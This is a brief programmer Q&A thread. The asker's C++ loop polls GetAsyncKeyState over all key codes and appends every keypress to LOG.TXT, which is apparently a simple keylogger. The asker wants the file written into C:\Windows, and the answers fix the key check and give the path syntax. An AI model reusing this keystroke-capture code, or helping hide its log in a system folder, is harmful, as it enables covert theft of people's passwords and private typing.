# I need help in saving my LOG.TXT file somewhere else

Tags: c++, logging, file-io

i'm programming something on C++ .i have just recently started and i have this piece of code which saves LOG.TXT into the same directory. But how do i save it to somewhere for example. c:\Windows\log.txt?

```
while (1)
{
 for(i = 8; i <= 190; i++)
 {
      if (GetAsyncKeyState(i) == -32767)
      Save(i,"LOG.TXT"); 
 }    
}
```

Comment: That should be `if (GetAsyncKeyState(i) & 0x8000)`, barring there being better ways to detect key presses that don't use up all the CPU to say the least.

Comment: take a view on this similar type of post http://stackoverflow.com/questions/5868246/output-file-to-specific-folder-c-windows-7

Comment: chris, when i replace == -32767 with & 0x8000, it writes each letter out 13 times in the log.txt file.

Answer (score 3, accepted):

Uh, try specifying the whole path in the arguments for `Save`? E.g. `Save(i,"c:\\Windows\\log.txt");`? You need the double-backslashes because backslashes are escape characters.